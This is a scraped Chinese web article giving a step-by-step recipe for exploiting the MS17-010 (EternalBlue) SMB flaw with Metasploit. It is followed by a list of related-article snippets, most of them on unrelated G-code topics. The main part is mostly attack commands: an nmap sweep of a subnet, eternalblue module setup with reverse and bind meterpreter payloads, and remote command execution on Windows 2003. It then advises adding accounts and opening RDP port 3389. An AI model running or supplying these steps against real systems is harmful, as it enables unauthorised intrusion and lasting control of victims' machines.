MS17010漏洞利用姿势

article/2025/9/16 16:02:04

MSF

搜索ms17-010

存在这些利用模块

0  exploit/windows/smb/ms17_010_eternalblue
1  exploit/windows/smb/ms17_010_psexec
2  auxiliary/admin/smb/ms17_010_command
3  auxiliary/scanner/smb/smb_ms17_010     
4  exploit/windows/smb/smb_doublepulsar_rce  

0  exploit/windows/smb/ms17_010_eternalblue 这个模块使用的机器:

  •  0   Automatic Target
  •   1   Windows 7
  •   2   Windows Embedded Standard 7
  •   3   Windows Server 2008 R2
  •   4   Windows 8
  •   5   Windows 8.1
  •   6   Windows Server 2012
  •   7   Windows 10 Pro
  •   8   Windows 10 Enterprise Evaluation

漏洞探测

扫描是否存在ms17-010漏洞

#nmap
nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open#使用msf
use auxiliary/scanner/smb/smb_ms17_010
set rhosts

MSF常规漏洞利用

msf > use exploit/windows/smb/ms17_010_eternalblue 目标出网时反向打:
msf > set payload windows/x64/meterpreter/reverse_tcp 目标不出网时正向打(如添加了路由):
msf > set payload windows/x64/meterpreter/bind_tcp

目标为win2003

当目标为win2003时可能,虽然目标机器存在漏洞,但是可能会返回不了session

换一个打发,直接执行系统命令

msf5 > use auxiliary/admin/smb/ms17_010_command
msf5 > set command whoami
msf5 > set rhosts x.x.x.x

 

 既然可以执行命令那就好办了~~可以添加账号、开启3389


http://chatgpt.dhexx.cn/article/X9Lx4sVB.shtml

相关文章

〖EXP〗NSA MS17010永恒之蓝一键工具

漏洞简介 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯…

MS17010原生打法

1、针对入口跳板机已经CS上线但是因为目标所在区域代理出来的流量卡慢、扫描会导致代理隧道崩溃、MSF的17010不成功但是原生利用工具成功的场景。此工具是由最原版调用fb.py那版提取出来的(原生版是最为稳定,并且能利用的版本)。 项目地址:https://gith…

MS17010(永恒之蓝)漏洞复现

MS17010(永恒之蓝)漏洞利用与复现 首先需要准备win7的环境做为靶机 获取信息 利用nmap扫描得到,靶机IP nmap -sP 192.168.229.0/24得到: IP:192.168.229.169 然后利用: nmap --scriptvuln 192.168.229.169得到靶机信息: 发…

关于ms17010渗透

今天来说一下ms17010渗透,大家都知道在2017爆发出来了永恒之蓝病毒,导致比特币严重涨价(为啥我没屯几个,这可能就是我穷的的原因吧),永恒之蓝的漏洞版本名称也被称之为ms17_010今天就来详细和大家讲一下 靶…

Metasploit工具介绍及ms17010复现

Metasploit渗透框架介绍及永恒之蓝复现 一、Metasploit渗透框架介绍1.1 名词解释1.2 MSF简介1.3 MSF框架结构1.4 MSF命令汇总1.4.1 常用命令1.4.2 基本命令1.4.3 Exploits模块1.4.4 漏洞名称规则 1.5 MSF模块介绍1.5.1 auxiliary(辅助模块)1.5.2 exploits(漏洞利用模块)1.5.3 p…

永恒之蓝-------MS17010漏洞重现

目录 引言永恒之蓝介绍什么是SMB协议SMB协议的工作原理 实验环境准备实验开始查看靶机和攻击机ip地址及子网掩码使用netdiscover工具对该网段进行局域网存活主机探测使用nmap对ip地址进行查询打开MSF使用search搜索搜索ms17_010使用模块进行分析并攻击设置攻击机ip并开始最后运…

gcode 解析入门1-1

marlin2.X 的源码分析 gcode 源码, 文件目录 队列类 解析类 gcode 类 指令类 文件分类

GRBL三:gcode代码解析(转载)

因初学GRBL,网上搜集了一些GRBL的资料,怕遗忘,所以转载过来,如有侵权请联系,立即删除。 原文地址:https://blog.csdn.net/zhangjikuan/article/details/46697019 1.G00X_Y_Z_ :快速定位指令&#xff0c…

GCode_interpreter解读

关于GCode_interpreter 下学期要做课设,要徒手画a0的图,准备做个A0的绘图仪@_@ 本来想用grbl来驱动,但了解之后发现它是用avr的c写的,而且代码量也挺大的,考虑到后面可能要加一些功能(换笔什么的),怕修改不来,就放弃了。后来又找了很多g代码解释器,最后…

05-gcode

MMIM: BAPI 货物移动的可能代码 SE16N 后台表 T158G 01 MB01 ------------ 02 MB31 ------------ 03 MB1A ------------ 04 MB1B ------------ 05 MB1C ------------ 06 MB11 ------------ 07 MB04 GT_GSMT-MVT_IND 只有…

GRBL分析:gcode解释器(二)

GCode解释器 - gc_execute_line函数解析 更新记录 2021-8-23 添加函数功能描述 2021-8-24 添加简单的流程绘制 函数功能描述 函数原型 uint8_t gc_execute_line(char *line);参数 char* line 在 protocol.c 文件的 protocol_main_loop 函数中,主循环内部会…

Marlin关于如何接收Gcode指令的详解

我研究的Marlin是1.0版本的.想用在的地方是stm32 Marlin关于接收Gcode命令最主要的函数就是: get_command() get_command()函数说实话对于我这样的学生来说程度还是挺复杂的. 为了节省大家理清代码和阅读文章的时间, 我全文用字力求精简, 别人已经写了的知识我就不会写 先上…

Gcode文件处理和执行

流程图: 1:SMC_OutQueue 不带参数>>>SMC_Interpolator 插补算法 2:CMC_CNC_REF 带参数>>>smc_NCDecoder 图型解析>>>ToolCorr 刀补>>>SmoothPath 圆弧>>>checkVelocities 速度 3:File 文件.txt/.cnc/.gcode>…

GCD简介

1. 什么是GCD GCD,全称是Grand Central Dispatch,它是C语言的API. GCD的核心 : 将block(任务)添加到queue(队列)中. 官方文档的描述: Grand Central Dispatch(GCD)是异步执行任务的技术之一。一般将应用程序中记述的线程管理用的代码在系统级中实现.开发者只需定义想执行的任…

激光雕刻机的位图-GCode转换方法实践

Author:Gary Li Date:2019-5-2 1. 简介 现在有一部分3D打印机带有激光雕刻功能,自己组装一台专用的激光雕刻机也并不复杂成本也很低。但是当我们使用激光雕刻机时,激光雕刻下位机只能接受路径指令,所以我们需要把位图——也就是我们平时最常…

3d打印实用小工具--GCode Viewer在线预览GCODE文件

使用solidworks2018绘制了一个零件 使用simplify3d进行切片 然后点击保存了这个文件。 没想到打印的时候,竟然打印成了这个零件。 原因是拷贝错了文件,而自己切片成功之后的GCode文件也无法预览,最后造成了时间和材料的浪费。 那么怎么需要打…

三轴XYZ平台生成gcode文件

1. 生成gcode坐标文件 gcode文件中保存的是需要绘制图形的路径信息,这里我们采用开源矢量图形编辑软件 Inkscape并通过Unicorn G-Code插件来生成 gcode坐标文件。 将软件资料包\Inkscape.rar 压缩文件解压到电脑上任意磁盘,软件内已安装 Unicorn G-Code插…

GRBL三:gcode代码解析

GRBL三:gcode代码解析 1.G00X_Y_Z_ :快速定位指令,_代表具体数值 可以同时针对X轴Y轴Z轴移动,只快速定位,不切削加工,相当于快速的移动到那个点上去 数值代表绝对位置 2.G01X_Y_Z_F_:直线差补 F指定进给速度mm/min…

3D打印gcode命令大全及解析

*G0:快速移动 *G1:控制移动 坐标轴XYZE移动控制(G0和G1一样) 例子:G0 F2000 X30 Y30 Z30 E3 *G2:顺时针画弧 *G3:逆时针画弧 此命令有两种形式:IJ-form和R-form。I指定了X偏移…

GCode软件使用说明书

欢迎使用GCode软件,本软件仅为辅助生成G代码软件...... 操作说明: 1、打开软件GCode.exe, (1)点击“文件”即可选择“新建”、“打开”、“保存”等功能,或者点击主界面快捷键; (…